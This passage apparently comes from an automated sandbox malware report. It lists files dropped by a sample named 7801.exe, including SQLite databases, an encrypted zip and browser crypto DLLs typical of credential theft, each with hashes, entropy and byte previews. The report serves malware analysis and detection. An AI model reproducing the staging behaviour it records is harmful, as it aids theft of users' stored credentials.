.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER62F3.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6960340998589127
Encrypted:	false
SSDEEP:	96:9GiZYWUwJQffYfYkWjqv8HlYEZ+ct6iPPIc+Wwn64k7/aXURiRj6IKx3:9jZDAYWqvhF6P/aXURiRjtKx3
MD5:	7AF93D6F1A0032753A596F52EFCD1423
SHA1:	651104BA14D35EEB3171D1274F415351F61A623B
SHA-256:	39FAFCCC867A221D859CC815615344DE9CFF040779FEB82EE10566D0A96961B3
SHA-512:	C1B52BF2ED2D5EA3627C0BECD3A65121590843EEB6088A7FFFFE8600D7AC9872773A266998C5D61AD9D17871E3D79FA9E3718957813590036C64081B98923A5E
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD6FE.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Jan 13 23:15:23 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	42152
Entropy (8bit):	2.0055914487492963
Encrypted:	false
SSDEEP:	192:nf+MTOf4LTvbOeh0k3O+Kyx1BQU+A8TxB1NCUVgyT85OtEGVP:oWieeHVLFuG5
MD5:	2A644774142729880A64441FCAE80948
SHA1:	3416A4D49E064E9D094FE99D1EB58DDE93630F17
SHA-256:	82AB2AD8EB0BB51F5B97E9F0FB3875BA4D6C6590267D95664C1F483C055AD5DD
SHA-512:	36B63A7E203E949B9798C0EE669014EE470A24FA2293995CE765DB5704E7D55C43390A2F7EBE4CEDCA9B07AD45894449F8E937E3FF993F9F850E859A208A1528
Malicious:	false
Reputation:	unknown
Preview:	MDMP....... ..........a....................................4...v(..........T.......8...........T...........................x...........d....................................................................U...........B..............GenuineIntelW...........T.......\|......a.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD49.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8392
Entropy (8bit):	3.701438796962995
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNihr6n6YrPSUjgmfORSNQa+pDi89bQssfKwm:RrlsNid6n6YDSUjgmfORS6Q/f8
MD5:	66F461C0EC0330D64B5D27D1E42648D3
SHA1:	F6F499237FE73C3A8B7B53D0EA42F47F6A0E5631
SHA-256:	E7CA29D3A434B2ED3E585CA292AA9A055860117EB9423D0945F16F136301375A
SHA-512:	98F0238DD3C54F793BDB14C75935EC1255A197EB6B608F38F567A3A42FFA75C7A6D935BB22F7E00C1CB18E38539693FE61D2FBC968413E7AA53CE641C2656353
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.5.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE103.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4685
Entropy (8bit):	4.475981505955246
Encrypted:	false
SSDEEP:	48:cvIwSD8zsCJgtWI9XfWSC8BZ8fm8M4JZ8qFcfi+q8vh8R6gxdAOHS3d:uITfQ0OSNoJiiKREAOHS3d
MD5:	867BAA274A448D5C6FE96CE722E9FF4A
SHA1:	353CF987A6D75C60C49B186B123D89FBF891B6EA
SHA-256:	ECBECDDA4BE1B31B50F5B1D2AA05A0CAA15C954398FCD4E2DE76BA658B507E7B
SHA-512:	0CA515EAA2FED710FF3751D4D9EA6404DE814073C3B8C414087A447A64D64A3D3A408F2139B4972692E3AD04CA034A1891962BC35DB1F08942EEEEE3FC548A17
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1341146" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\LocalLow\1xVPfvJcrg Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\RYwTiizs2t Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\frAQBc8Wsa Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\rQF69AzBla Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.7006690334145785
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
MD5:	A7FE10DA330AD03BF22DC9AC76BBB3E4
SHA1:	1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
SHA-256:	8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
SHA-512:	1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	123344
Entropy (8bit):	6.504957642040826
Encrypted:	false
SSDEEP:	1536:DkO/6RZFrpiS7ewflNGa35iOrjmwWTYP1KxBxZJByEJMBrsuLeLsWxcdaocACs0K:biRZFdBiussQ1MBjq2aocts03/7FE
MD5:	F92586E9CC1F12223B7EEB1A8CD4323C
SHA1:	F5EB4AB2508F27613F4D85D798FA793BB0BD04B0
SHA-256:	A1A2BB03A7CFCEA8944845A8FC12974482F44B44FD20BE73298FFD630F65D8D0
SHA-512:	5C047AB885A8ACCB604E58C1806C82474DC43E1F997B267F90C68A078CB63EE78A93D1496E6DD4F5A72FDF246F40EF19CE5CA0D0296BBCFCFA964E4921E68A2F
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y.Z.............x.......x.......x......=z......=z......=z.......x.......x..........z.../{....../{....../{....../{b...../{......Rich............PE..L...C@.\.........."!.................b.......0......................................~p....@.................................p...........h...........................0...T................... ...........@............0..$............................text...7........................... ..`.orpc........ ...................... ..`.rdata...y...0...z..................@..@.data...............................@....rsrc...h...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26064
Entropy (8bit):	5.981632010321345
Encrypted:	false
SSDEEP:	384:KuAjyb0Xc6JzVuLoW2XDOc3TXg1hjsvDG8A3OPLon07zS:BEygs6RV6oW2Xd38njiDG8Mj
MD5:	A7FABF3DCE008915CEE4FFC338FA1CE6
SHA1:	F411FB41181C79FBA0516D5674D07444E98E7C92
SHA-256:	D368EB240106F87188C4F2AE30DB793A2D250D9344F0E0267D4F6A58E68152AD
SHA-512:	3D2935D02D1A2756AAD7060C47DC7CABBA820CC9977957605CE9BBB44222289CBC451AD331F408317CF01A1A4D3CF8D9CFC666C4E6B4DB9DDD404C7629CEAA70
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S......U...U...U...U...U..T...U..T...U..T...U..T...U5.T...U...U!..U..T...U..T...U...U...U..T...URich...U........PE..L...<@.\.........."!.........8......0........0.......................................7....@..........................=......0>..x....`...............H..........<...09..T............................9..@............0...............................text...f........................... ..`.orpc........ ...................... ..`.rdata.......0......................@..@.data...@....P.......(..............@....rsrc........`.......*..............@..@.reloc..<............D..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	70608
Entropy (8bit):	5.389701090881864
Encrypted:	false
SSDEEP:	768:3n8PHF564hn4wva3AVqH5PmE0SjA6QM0avrDG8MR43:38th4wvaQVE5PRl0xs
MD5:	5243F66EF4595D9D8902069EED8777E2
SHA1:	1FB7F82CD5F1376C5378CD88F853727AB1CC439E
SHA-256:	621F38BD19F62C9CE6826D492ECDF710C00BBDCF1FB4E4815883F29F1431DFDA
SHA-512:	A6AB96D73E326C7EEF75560907571AE9CAA70BA9614EB56284B863503AF53C78B991B809C0C8BAE3BCE99142018F59D42DD4BCD41376D0A30D9932BCFCAEE57A
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~.....K...K...K.g.K...K4}.J...K4}.J...K4}.J...K4}.J...K...J...K...J...K...K...K&\|.J...K&\|.J...K&\|uK...K&\|.J...KRich...K........PE..L...J@.\.........."!.................$.......0...............................0............@.........................0z.......z...........v................... .......u..T...........................Hv..@............0...............................orpc...t........................... ..`.text........ ...................... ..`.rdata...Q...0...R..................@..@.data................j..............@....rsrc....v.......x...t..............@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	6.2121285323374185
Encrypted:	false
SSDEEP:	384:Y0GKgKt7QXmFJNauBT5+BjdvDG8A3OPLon6nt:aKgWc2FnnTOVDG8MSt
MD5:	7CD244C3FC13C90487127B8D82F0B264
SHA1:	09E1AD17F1BB3D20BD8C1F62A10569F19E838834
SHA-256:	BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
SHA-512:	C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X...X...X... J..X...:...X...:...X...:...X...:...X...8...X...X...X...;...X...;...X...;&..X...;...X..Rich.X..........................PE..L....=.\.........."!................@........0............................................@.........................0:.......:..d....`..p............0.......p.......5..T...........................86..@............0...............................text...v........................... ..`.orpc...<.... ...................... ..`.rdata..r....0......................@..@.data........P.......&..............@....rsrc...p....`.......(..............@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	117712
Entropy (8bit):	6.598338256653691
Encrypted:	false
SSDEEP:	3072:9b9ffsTV5n8cSQQtys6FXCVnx+IMD6eN07e:P25V/QQs6WTMex7e
MD5:	A436472B0A7B2EB2C4F53FDF512D0CF8
SHA1:	963FE8AE9EC8819EF2A674DBF7C6A92DBB6B46A9
SHA-256:	87ED943D2F06D9CA8824789405B412E770FE84454950EC7E96105F756D858E52
SHA-512:	89918673ADDC0501746F24EC9A609AC4D416A4316B27BF225974E898891699B630BB18DB32432DA2F058DC11D9AF7BAF95D067B29FB39052EE7C6F622718271B
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s..y7.{7.{7.{..x+>.{..~+I.{...+%.{.x+$.{..+'.{.~+..{..z+4.{7.zA.{..~+>.{..{+6.{...6.{..y+6.{Rich7.{........PE..L....@.\.........."!................t........0.......................................S....@.........................P...P.......(...................................`...T...............................@............0..D............................text............................... ..`.rdata...l...0...n... ..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sG8rM8v\dI3hX2r.zip Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	2828315
Entropy (8bit):	7.998625956067725
Encrypted:	true
SSDEEP:	49152:tiGLaX5/cgbRETlc0EqgSVAx07XZiEi4qiefeEJGt5ygL0+6/qax:t9OX9alwJSVP1fnefekGt5CP
MD5:	1117CD347D09C43C1F2079439056ADA3
SHA1:	93C2CE5FC4924314318554E131CFBCD119F01AB6
SHA-256:	4CFADA7EB51A6C0CB26283F9C86784B2B2587C59C46A5D3DC0F06CAD2C55EE97
SHA-512:	FC3F85B50176C0F96898B7D744370E2FF0AA2024203B936EB1465304C1C7A56E1AC078F3FDF751F4384536602F997E745BFFF97F1D8FF2288526883185C08FAF
Malicious:	false
Reputation:	unknown
Preview:	PK.........znN<..{r....i......nssdbm3.dll...\|...8...N..Y..6.$J.....$1...D .a.....jL.V..C...N.;....}./............$...Z,T.R.qc...Ec.=................;..{..s....p.`..A.?M.....W!.....a..?N...~e.A..W.o.....[.}...,...;.+\....Jw.\|...k.......<yR.^.E.o.nxs.c...=V....,..F....cu.....w.O..[..u.{..<.w....7P...{..K~..E..w...c...z^..[Z....6.G.V.2..+.n4......1M.......w{f..nJL..{. d......M..+.. ......./.)..$X!......L..K.`.M...w.I..LA8r.IX...r...87..}........<.].r.....TWm......b6/._....a..W.lB...3.n.._...j....o.Mz.._Q........8....K............gr..L..H...v....6[...4I...{.1g..<..>M..$G.&Y........-.....O..9\...,t..W.m.X ..Y.3....S<#}.".>.0RBg,...lh.s..o.....r.p8...)..3..K.v....ds.n3.+]....+....krMu._.Y\..../8T......&.BC.".u..;..e.k u$......~`.{.!.M...\W.Y.37+nQ.Z.*...3\G..5d....Z.hVL..Z.\|k.5...XF.Y..lVVW..C..\|.....b..\.Z...m. ..0...P.F8{].U.p..RW,n...MM.....s..._@..>Q.. ...N.>.T?WM....)9B.............mVW.......b.6{..\|!......O....M....>.>.$\.%..L.zF.l...3

C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	334288
Entropy (8bit):	6.808908775107082
Encrypted:	false
SSDEEP:	6144:6cYBCU/bEPU6Rc5xUqc+z75nv4F0GHrIraqqDL6XPSed:67WRCB7zl4F0I4qn6R
MD5:	60ACD24430204AD2DC7F148B8CFE9BDC
SHA1:	989F377B9117D7CB21CBE92A4117F88F9C7693D9
SHA-256:	9876C53134DBBEC4DCCA67581F53638EBA3FEA3A15491AA3CF2526B71032DA97
SHA-512:	626C36E9567F57FA8EC9C36D96CBADEDE9C6F6734A7305ECFB9F798952BBACDFA33A1B6C4999BA5B78897DC2EC6F91870F7EC25B2CEACBAEE4BE942FE881DB01
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....@.\.........."!.........f...............................................p............@.........................p...P............@..x....................P......0...T...............................@...............8............................text...d........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	132048
Entropy (8bit):	6.627391684128337
Encrypted:	false
SSDEEP:	3072:qgXCFTvwqiiynFa6zqeqQZ06DdEH4sq9gHNaIkIQhEwe:qdvwqMFbOePIP/zkIQ2h
MD5:	5A49EBF1DA3D5971B62A4FD295A71ECF
SHA1:	40917474EF7914126D62BA7CDBF6CF54D227AA20
SHA-256:	2B128B3702F8509F35CAD0D657C9A00F0487B93D70336DF229F8588FBA6BA926
SHA-512:	A6123BA3BCF9DE6AA8CE09F2F84D6D3C79B0586F9E2FD0C8A6C3246A91098099B64EDC2F5D7E7007D24048F10AE9FC30CCF7779171F3FD03919807EE6AF76809
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 2%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q...?S..?S..?S..S..?S\|.>R..?S;..S..?S\|.<R..?S\|.:R..?S\|.;R..?S..>R..?S..>S..?Sn.;R.?Sn.?R..?Sn..S..?Sn.=R..?SRich..?S........................PE..L....@.\.........."!.........f...... ........................................0............@.............................................x.................... ......p...T..............................@...............\............................text...:........................... ..`.rdata...@.......B..................@..@.data...l...........................@....rsrc...x...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20432
Entropy (8bit):	6.337521751154348
Encrypted:	false
SSDEEP:	384:YxfML3ALxK0AZEuzOJKRsIFYvDG8A3OPLonw4S:0fMmxFyO4RpGDG8MjS
MD5:	4FE544DFC7CDAA026DA6EDA09CAD66C4
SHA1:	85D21E5F5F72A4808F02F4EA14AA65154E52CE99
SHA-256:	3AABBE0AA86CE8A91E5C49B7DE577AF73B9889D7F03AF919F17F3F315A879B0F
SHA-512:	5C78C5482E589AF7D609318A6705824FD504136AEAAC63F373E913DA85FA03AF868669534496217B05D74364A165D7E08899437FCC0E3017F02D94858BA814BB
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9..j..j..j...j..j^..k..j^..k..j^..k..j^..k..j...k..j..j..jL..k..jL..k..jL.bj..jL..k..jRich..j........................PE..L....<.\.........."!................Y........0...............................p......r.....@..........................5.......6.......P..x............2.......`..x....0..T...........................(1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc...x....P.......,..............@..@.reloc..x....`.......0..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sG8rM8v\lgpllibs.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	55760
Entropy (8bit):	6.738700405402967
Encrypted:	false
SSDEEP:	1536:LxsBS3Q6j+37mWT7DT/GszGrn7iBCmjFCOu:LxTBcmWT7X/Gszen7icmjFtu
MD5:	56E982D4C380C9CD24852564A8C02C3E
SHA1:	F9031327208176059CD03F53C8C5934C1050897F
SHA-256:	7F93B70257D966EA1C1A6038892B19E8360AADD8E8AE58E75EBB0697B9EA8786
SHA-512:	92ADC4C905A800F8AB5C972B166099382F930435694D5F9A45D1FDE3FEF94FAC57FD8FAFF56FFCFCFDBC61A43E6395561B882966BE0C814ECC7E672C67E6765A
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...........l...l...l.......l..~....l..9...l..~....l..~....l..~....l.......l..l....l...l...l...l...l..l....l..l....l..l....l..l..l..l....l..Rich.l..........................PE..L...z@.\.........."!.........2......................................................t.....@...........................................x...............................T...............................@............................................text.............................. ..`.rdata..>...........................@..@.data...............................@....rodata.8...........................@..@.rsrc...x...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sG8rM8v\libEGL.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22480
Entropy (8bit):	6.528357540966124
Encrypted:	false
SSDEEP:	384:INZ9mLVDAffJJKAtn0mLAb8X3FbvDG8A3OPLonzvGb:4mx+fXvn4YFrDG8MKb
MD5:	96B879B611B2BBEE85DF18884039C2B8
SHA1:	00794796ACAC3899C1FB9ABBF123FEF3CC641624
SHA-256:	7B9FC6BE34F43D39471C2ADD872D5B4350853DB11CC66A323EF9E0C231542FB9
SHA-512:	DF8F1AA0384A5682AE47F212F3153D26EAFBBF12A8C996428C3366BEBE16850D0BDA453EC5F4806E6A62C36D312D37B8BBAFF549968909415670C9C61A6EC49A
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N{.N{.N{.6..N{.F,z.N{.F,x.N{.F,~.N{.F,..N{..z.N{.T-z.N{.Nz..N{.T-~.N{.T-{.N{.T-..N{.T-y.N{.Rich.N{.........................PE..L...aA.\.........."!.........(............... ...............................p......~.....@..........................%..........d....P..x............:.......`.......!..T............................"..@............ ...............................text... ........................... ..`.rdata....... ......................@..@.data........@.......2..............@....rsrc...x....P.......4..............@..@.reloc.......`.......8..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sG8rM8v\nssdbm3.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\7801.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	92624
Entropy (8bit):	6.639527605275762
Encrypted:	false
